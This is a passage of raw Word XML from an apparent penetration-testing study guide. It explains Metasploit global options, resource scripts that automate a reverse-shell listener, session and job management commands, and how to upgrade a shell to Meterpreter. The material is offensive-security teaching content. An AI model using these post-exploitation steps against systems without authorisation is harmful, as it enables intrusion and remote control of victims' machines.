      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of these scripts use the global datastore of Metasploit to set options such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unset</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we define options in the context of a running module. However, we can also define values for options across all modules by setting </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">global options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. These options can be set with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and unset with</w:t>
      </w:r>
      <w:hyperlink r:id="rId162">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId163">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">unsetg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000638">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource scripts can be quite handy to automate parts of a penetration test. We can create a set of resource scripts for repetitive tasks and operations. We can prepare those scripts and then modify them for each penetration test. For example, we could prepare resource scripts for listeners, pivoting, post-exploitation, and much more. Using them on multiple penetration tests can save us a lot of time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000639">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's summarize what we learned in this section. We began by getting familiar with resource scripts. Then, we created our own resource script to automate the setup process of a multi/handler listener. Finally, we executed the resource script and a corresponding executable file to receive an incoming Meterpreter reverse shell, which migrated itself to a newly spawned Notepad process.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j86gzo3x9ntx" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs and Sessions:</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t xml:space="preserve">Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000063F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at all sessions, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000640">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To interact with one session, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i [inset number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000641">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To background a session, use: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000642">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000643">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View sessions: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000645">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go into session:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions -i [session_id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000646">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="542"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill session: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -k [session_id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000647">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000648">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to interact with job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000649">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View jobs: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill job:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs -k [job_id]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill all jobs:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs -K</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jobs vs. Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000064F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will show all the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: background tasks that Metasploit is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000650">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000651">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will show all the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A live connection to a target machine, usually gained after a successful exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000652">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000653">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000654">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000655">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7ta5x79p1511" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to upgrade from a weak shell to a meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use sessions -u to Upgrade Automatically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000659">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out the session number of the shell you want to upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -u &lt;session_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade the shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;new_sessions_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get into the session of the NEW shell. The old shell still exists in old session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000065F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use shell_to_meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000660">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000661">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000662">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out which session you are in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000663">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
